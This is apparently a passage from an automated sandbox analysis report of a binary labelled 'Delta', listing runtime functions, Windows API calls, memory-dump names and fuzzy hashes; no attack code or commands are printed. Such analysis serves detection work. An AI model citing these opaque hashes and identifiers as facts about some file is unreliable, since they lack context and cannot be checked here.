LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,005F6F1A,?,?,-00000008,?,00000000), ref: 005F6545

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 400169143eee28142ae57086a46d5675d9ce69c30a8ac12601974819da7702fd
Instruction ID: 240331bc49530b8d306d83253ee39ff955e3fe03c7ad0449ddaac6bae43d0f8a
Opcode Fuzzy Hash: 400169143eee28142ae57086a46d5675d9ce69c30a8ac12601974819da7702fd
Instruction Fuzzy Hash: 44F0683240011EBBCF126F90DC159EE3E66FB487A0F058910BA1825020CB36C971AB91

Function 005F56B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,005F9A64,?,00000000,?,?,005F9704,?,00000007,?,?,005FA04A,?,?), ref: 005F56CD
GetLastError.KERNEL32(?,?,005F9A64,?,00000000,?,?,005F9704,?,00000007,?,?,005FA04A,?,?), ref: 005F56D8

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1fb1d60d6b79c85755134e4e8847a58be0d519c9008f3dea8d11503722d2a64a
Instruction ID: 468f0d15ed82fadae144b17147f590c1eb0825d78de940f31af6c28235692b3d
Opcode Fuzzy Hash: 1fb1d60d6b79c85755134e4e8847a58be0d519c9008f3dea8d11503722d2a64a
Instruction Fuzzy Hash: 08E08632140A19ABDB112BA4EC0CBE97F99AB40752F145421F71CD60A0D7398850C7D8

Function 005E14C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 005E150B

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 7a08b880120f1d7e7079c12e9e75b077eee1b7c76a24a6960d34250c1e55eea2
Instruction ID: 2ae1d8bfd5b8bc6f7be0af579644f03ca622dc30c6e72551a0e47de8bfb02b65
Opcode Fuzzy Hash: 7a08b880120f1d7e7079c12e9e75b077eee1b7c76a24a6960d34250c1e55eea2
Instruction Fuzzy Hash: 9AD1F474604B808FC728DF3AC599A66BBE0BF48714B148A5DE8D78BBA1D734F904CB45

Function 005F7837 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,005F76B8,?), ref: 005F7869

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 4f430072cffd7d3f11ed2d8bec239e4ecd61a5d46defa98f6c4311db05ddbdbf
Instruction ID: b16f9f56e4ae8f74e2ee34313715499aa11605ab7ed3397ffd6882a8b06de520
Opcode Fuzzy Hash: 4f430072cffd7d3f11ed2d8bec239e4ecd61a5d46defa98f6c4311db05ddbdbf
Instruction Fuzzy Hash: 9E514BB190815DAEDB118A28CD84BF57FADFF19300F1401E9E689C7142D3799D85CBA0

Function 005E8570 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c730388a1834ed52e43c9843f872423a7e85f131ee7be7a0a64cb3a54a7a259
Instruction ID: 54c6f3d9a143535422d2012eb84c21296ae98092b05e7b2f28d826243901d914
Opcode Fuzzy Hash: 2c730388a1834ed52e43c9843f872423a7e85f131ee7be7a0a64cb3a54a7a259
Instruction Fuzzy Hash: A741B171A0055AAFCF18DF6AC4509FDBBB9FF18310B14016AE589E7640EF31E945CB90

Function 005F670D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61bc16c5d798e7780de47d88cad0a058f65130f60535376a5d14ac38c21899dd
Instruction ID: 792f19518a91111265ccb65dc594350e2e938d60bd4a21d93bb47a2c0f228a8a
Opcode Fuzzy Hash: 61bc16c5d798e7780de47d88cad0a058f65130f60535376a5d14ac38c21899dd
Instruction Fuzzy Hash: 1801F53360121A9B9F069F68EC819663BA6FBC17287288625FA10CB094DB35AC508BD1

Function 005F56F1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,005F7675,?,?,005F7675,00000220,?,?,?), ref: 005F5723

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5aa14442c031ee42f2b85f03ec354b9c1ea6d4e0bf5c010c8caa6292f1e2d41f
Instruction ID: 738e8e46ba348783399e8efa08b6d069cf3e2e668a929c4a29adef570f94d1c9
Opcode Fuzzy Hash: 5aa14442c031ee42f2b85f03ec354b9c1ea6d4e0bf5c010c8caa6292f1e2d41f
Instruction Fuzzy Hash: A8E06D31642E6AD6DB217A659C05BBB3E88FF817F0F154521EF46961D0FBA8CC0186E4

Non-executed Functions

Function 00600502 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00600719

Strings

1#QNAN, xrefs: 00600615
1#SNAN, xrefs: 0060060E
1#IND, xrefs: 00600607
1#INF, xrefs: 00600638

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 64e4e47b91c4c3c0884d33d51aa3e3d25937893bba143e0d16188041f198cc8b
Instruction ID: f470e2321a90990a5b9bc58bc9dca2f2394255ed43bd6051a24d98746dfad3d8
Opcode Fuzzy Hash: 64e4e47b91c4c3c0884d33d51aa3e3d25937893bba143e0d16188041f198cc8b
Instruction Fuzzy Hash: D2D23B71E482298FDB69CE28CD447EAB7B6FB45305F1441EAD40DE7280DB78AE858F41

Function 005FB1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,005FAB6D,00000002,00000000,?,?,?,005FAB6D,?,00000000), ref: 005FB250
GetLocaleInfoW.KERNEL32(?,20001004,005FAB6D,00000002,00000000,?,?,?,005FAB6D,?,00000000), ref: 005FB279
GetACP.KERNEL32(?,?,005FAB6D,?,00000000), ref: 005FB28E

Strings

ACP, xrefs: 005FB1D5
OCP, xrefs: 005FB20B

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6ab39ea83970f68d5733eeb983c959d40a726d4de7b289851d6f3d49c2f59069
Instruction ID: 29d41accbff5e616ba1b5f7359f61a04b025bc523f47ab2ff995b919c900db92
Opcode Fuzzy Hash: 6ab39ea83970f68d5733eeb983c959d40a726d4de7b289851d6f3d49c2f59069
Instruction Fuzzy Hash: 7021B32AA40108EAFB348F64C905BBF7FA7BF54B50B5A8524EB0AD7114E736DE40C350

Function 005FAA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 005FAB3F
IsValidCodePage.KERNEL32(00000000), ref: 005FAB7D
IsValidLocale.KERNEL32(?,00000001), ref: 005FAB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005FABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005FABF3

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: af274de219f071324e503e65c53518f00a2535b2b192f51324d9f8788631743b
Instruction ID: 8d8ae415483fc26068bff05462d520e2e096a35592d55631747cdbcdbe5b44c7
Opcode Fuzzy Hash: af274de219f071324e503e65c53518f00a2535b2b192f51324d9f8788631743b
Instruction Fuzzy Hash: 24515FB1A0021EAFEB10DFA5CC45ABA7BB9BF44700F144469BA48E7191E7749D44CB63

Function 005F3440 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: bef3c5899bd8e07124d85758f90449be11435563a88b40353669e6b4ed24fd6d
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: 9E023EB1E012199BEF14DFA9C8806AEFBF1FF88314F148169E615E7341D735AA45CB90

Function 005FB799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005FB889

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0d2fa2a8674212543f1a26b6b45c70fbdbd5ce5d3ebed7df8d23616e3569fe4a
Instruction ID: 50f8e18100d24ebb4c1641b2643babded59c4f79ca46b1c93c3e51118628d183
Opcode Fuzzy Hash: 0d2fa2a8674212543f1a26b6b45c70fbdbd5ce5d3ebed7df8d23616e3569fe4a
Instruction Fuzzy Hash: F071CF7190516DAEEF20AF24CC8DABABFB9FF45340F1441D9E649A3211EB394E808F10

Function 005E9A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005E9A7F
IsDebuggerPresent.KERNEL32 ref: 005E9B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005E9B64
UnhandledExceptionFilter.KERNEL32(?), ref: 005E9B6E

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8410012e338653ff480b5c143c23528b52161ea02fffc7f4f701281633e30b17
Instruction ID: ba2e2a1a2cbdd80e666ab0f858572942a8b953fde58e5e83c3e6a2b398634988
Opcode Fuzzy Hash: 8410012e338653ff480b5c143c23528b52161ea02fffc7f4f701281633e30b17
Instruction Fuzzy Hash: C431F9B5D053299BDF21DFA5D9497CDBBB8BF48300F1041EAE40CAB250E7719A858F45

Function 005EA335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 005EA347
GetCurrentThreadId.KERNEL32 ref: 005EA356
GetCurrentProcessId.KERNEL32 ref: 005EA35F
QueryPerformanceCounter.KERNEL32(?), ref: 005EA36C

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ab4b80f9ea997276fba6bd27f9e320b6c5a292dca00680a2f25a7cfff5cb03d1
Instruction ID: e01ec535383a987fcefdec46577761adc27fad4cef760f2cb99872c5bf719e08
Opcode Fuzzy Hash: ab4b80f9ea997276fba6bd27f9e320b6c5a292dca00680a2f25a7cfff5cb03d1
Instruction Fuzzy Hash: 22F0B234C4021CEBCB00EBB4CA8999FBBF4FF1C200B9199A6A412E7110E730AB448F51

Function 005FAD30 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FAD84
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FADCE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FAE94

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 700886d269e3de67147940666f3f71da36e61deb13b519a0d3b27d3d48e19feb
Instruction ID: 8165e2b495ac0b0ad5db45b72a223728b4c94de0b4253f3d8f47350013202dc9
Opcode Fuzzy Hash: 700886d269e3de67147940666f3f71da36e61deb13b519a0d3b27d3d48e19feb
Instruction Fuzzy Hash: BF6194B595020B9FEB289F24CC86BBA7BA8FF44310F144579EB09C6285E778D950CB52

Function 005F1A60 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005F1B58
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005F1B62
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005F1B6F

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8517d193871604491c9151a738cfa2953d3cb0fb2c666a18a4b64b8c3bdb64c8
Instruction ID: 6b5d4b209c7d9fec6aefcef15ec4e48b745e73470215890efd325a7ac3dffa94
Opcode Fuzzy Hash: 8517d193871604491c9151a738cfa2953d3cb0fb2c666a18a4b64b8c3bdb64c8
Instruction Fuzzy Hash: A531D2B494132D9BCB21DF69D888BDDBBB8BF48310F5041EAE41CA7250EB749B858F44

Function 005FEA8E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005FE9E9,?,?,00000008,?,?,0060539B,00000000), ref: 005FECBB

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 66c1c8d2e324bde691064f8c73d28a2e331cac10f3dd1608a3a9263335118690
Instruction ID: 59457fe16efe39c1507bfe54af74336cfb2c25983c144370b3d32e6c51f625d3
Opcode Fuzzy Hash: 66c1c8d2e324bde691064f8c73d28a2e331cac10f3dd1608a3a9263335118690
Instruction Fuzzy Hash: 04B1F9316106099FD715CF28C48AB657FE1FF45364F298A58EA9ACF2B1C339E991CB40

Function 005E96DB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005E96F1

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b3738988c0132764c166754745527ec5c89838695ed0e40faf49afde22c16267
Instruction ID: 824074eff3801c20d835cd8477cf328fb17a756cf97217a24ef8052539a0e12c
Opcode Fuzzy Hash: b3738988c0132764c166754745527ec5c89838695ed0e40faf49afde22c16267
Instruction Fuzzy Hash: E7A19DB19152498FEF58CF59D8912A9BBF2FF48310F18E52AD465EB260C3B49980CF90

Function 005FB6E8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

